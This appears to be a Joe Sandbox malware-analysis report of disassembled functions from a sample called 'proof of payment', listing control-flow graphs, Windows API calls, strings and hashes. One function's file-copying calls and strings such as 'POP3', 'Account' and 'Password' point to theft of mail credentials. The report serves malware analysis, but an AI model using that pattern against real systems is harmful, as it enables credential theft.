                                      control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 155 10001995-10001999 152->155 156 10001987 152->156 153->152 157 10001854-10001881 call 100044b0 * 2 call 10001db7 153->157 155->150 155->151 159 1000198a-1000198d call 10002c40 156->159 170 10001887-1000189f call 100044b0 call 10001db7 157->170 171 1000193d-10001943 157->171 165 10001992 159->165 165->155 170->171 187 100018a5-100018a8 170->187 173 10001945-10001947 171->173 174 1000197e-10001980 171->174 173->174 176 10001949-1000194b 173->176 174->159 178 10001961-1000197c call 100016aa 176->178 179 1000194d-1000194f 176->179 178->165 182 10001951-10001953 179->182 183 10001955-10001957 179->183 182->178 182->183 184 10001959-1000195b 183->184 185 1000195d-1000195f 183->185 184->178 184->185 185->174 185->178 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->155 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->155
                                      APIs
                                        • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                        • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                        • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                      • _strlen.LIBCMT ref: 10001855
                                      • _strlen.LIBCMT ref: 10001869
                                      • _strlen.LIBCMT ref: 1000188B
                                      • _strlen.LIBCMT ref: 100018AE
                                      • _strlen.LIBCMT ref: 100018C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen$File$CopyCreateDelete
                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                      • API String ID: 3296212668-3023110444
                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: %m$~$Gon~$~F@7$~dra
                                      • API String ID: 4218353326-230879103
                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 283 10007ce6-10007ce9 279->283 291 10007dae-10007db5 280->291 281->280 282 10007d53-10007d90 call 1000571e * 4 281->282 282->280 283->277 286 10007ceb-10007cf3 283->286 289 10007cf5-10007cf8 286->289 290 10007d0d-10007d15 286->290 289->290 295 10007cfa-10007d0c call 1000571e call 100090ba 289->295 293 10007d17-10007d1a 290->293 294 10007d2f-10007d43 call 1000571e * 2 290->294 296 10007dd4-10007dd8 291->296 297 10007db7-10007dbb 291->297 293->294 299 10007d1c-10007d2e call 1000571e call 100091b8 293->299 294->277 295->290 300 10007df0-10007dfc 296->300 301 10007dda-10007ddf 296->301 304 10007dd1 297->304 305 10007dbd-10007dc0 297->305 299->294 300->291 311 10007dfe-10007e0b call 1000571e 300->311 308 10007de1-10007de4 301->308 309 10007ded 301->309 304->296 305->304 313 10007dc2-10007dd0 call 1000571e * 2 305->313 308->309 318 10007de6-10007dec call 1000571e 308->318 309->300 313->304 318->309
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                      • _free.LIBCMT ref: 10007CFB
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 10007D1D
                                      • _free.LIBCMT ref: 10007D32
                                      • _free.LIBCMT ref: 10007D3D
                                      • _free.LIBCMT ref: 10007D5F
                                      • _free.LIBCMT ref: 10007D72
                                      • _free.LIBCMT ref: 10007D80
                                      • _free.LIBCMT ref: 10007D8B
                                      • _free.LIBCMT ref: 10007DC3
                                      • _free.LIBCMT ref: 10007DCA
                                      • _free.LIBCMT ref: 10007DE7
                                      • _free.LIBCMT ref: 10007DFF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _free.LIBCMT ref: 100059EA
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100059F6
                                      • _free.LIBCMT ref: 10005A01
                                      • _free.LIBCMT ref: 10005A0C
                                      • _free.LIBCMT ref: 10005A17
                                      • _free.LIBCMT ref: 10005A22
                                      • _free.LIBCMT ref: 10005A2D
                                      • _free.LIBCMT ref: 10005A38
                                      • _free.LIBCMT ref: 10005A43
                                      • _free.LIBCMT ref: 10005A51
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 1454806937-0
                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 388 10009563-10009565 382->388 389 1000953f-10009542 382->389 384->378 393 1000957b-1000959b WideCharToMultiByte 384->393 388->384 391 10009548-1000955a call 100079e6 389->391 392 10009609-10009628 389->392 391->378 399 10009560-10009561 391->399 392->378 393->378 395 100095a1-100095b7 WriteFile 393->395 397 100095b9-100095ca 395->397 398 1000962a-10009630 GetLastError 395->398 397->378 400 100095cc-100095d0 397->400 398->378 399->393 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->398 404 100095f2-100095f6 401->404 402->379 403 10009607 402->403 403->378 404->378 405 100095f8-100095fb 404->405 405->402
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                      • __fassign.LIBCMT ref: 1000954F
                                      • __fassign.LIBCMT ref: 1000956A
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 421 10003400-10003405 420->421 421->417 425 10003407-10003409 421->425 425->413 429 1000340b 425->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 434 10003457-10003466 call 1000bbe0 433->434 442 10003483 434->442 443 10003468-10003480 434->443 439->440 442->432 443->442
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                      • _free.LIBCMT ref: 100092AB
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100092B6
                                      • _free.LIBCMT ref: 100092C1
                                      • _free.LIBCMT ref: 10009315
                                      • _free.LIBCMT ref: 10009320
                                      • _free.LIBCMT ref: 1000932B
                                      • _free.LIBCMT ref: 10009336
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 492 10008862-10008886 MultiByteToWideChar 489->492 493 10008857-1000885f 489->493 490->489 497 1000884e 490->497 495 10008a19-10008a2c call 10002ada 492->495 496 1000888c-10008898 492->496 493->492 498 1000889a-100088ab 496->498 499 100088ec 496->499 497->489 502 100088ca-100088db call 100056d0 498->502 503 100088ad-100088bc call 1000bf20 498->503 501 100088ee-100088f0 499->501 505 100088f6-10008909 MultiByteToWideChar 501->505 506 10008a0e 501->506 502->506 516 100088e1 502->516 503->506 515 100088c2-100088c8 503->515 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->495 517 100088e7-100088ea 515->517 516->517 517->501 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 528 1000894c-10008966 call 10005f19 523->528 529 100089cb-100089cd 524->529 526 10008992-100089a1 call 1000bf20 525->526 527 100089ab-100089bc call 100056d0 525->527 533 10008a07-10008a0d call 10008801 526->533 540 100089a3-100089a9 526->540 527->533 542 100089be 527->542 528->510 543 1000896c 528->543 529->533 534 100089cf-100089e8 call 10005f19 529->534 533->506 534->533 546 100089ea-100089f1 534->546 545 100089c4-100089c7 540->545 542->545 543->506 545->529 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->533 550 10008a35-10008a3c call 10008801 549->550 550->510
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                      • __freea.LIBCMT ref: 10008A08
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      • __freea.LIBCMT ref: 10008A11
                                      • __freea.LIBCMT ref: 10008A36
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _strlen.LIBCMT ref: 10001607
                                      • _strcat.LIBCMT ref: 1000161D
                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                      • String ID:
                                      • API String ID: 1922816806-0
                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$AttributesFilelstrcat
                                      • String ID:
                                      • API String ID: 3594823470-0
                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                      • _free.LIBCMT ref: 10005B2D
                                      • _free.LIBCMT ref: 10005B55
                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                      • _abort.LIBCMT ref: 10005B74
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
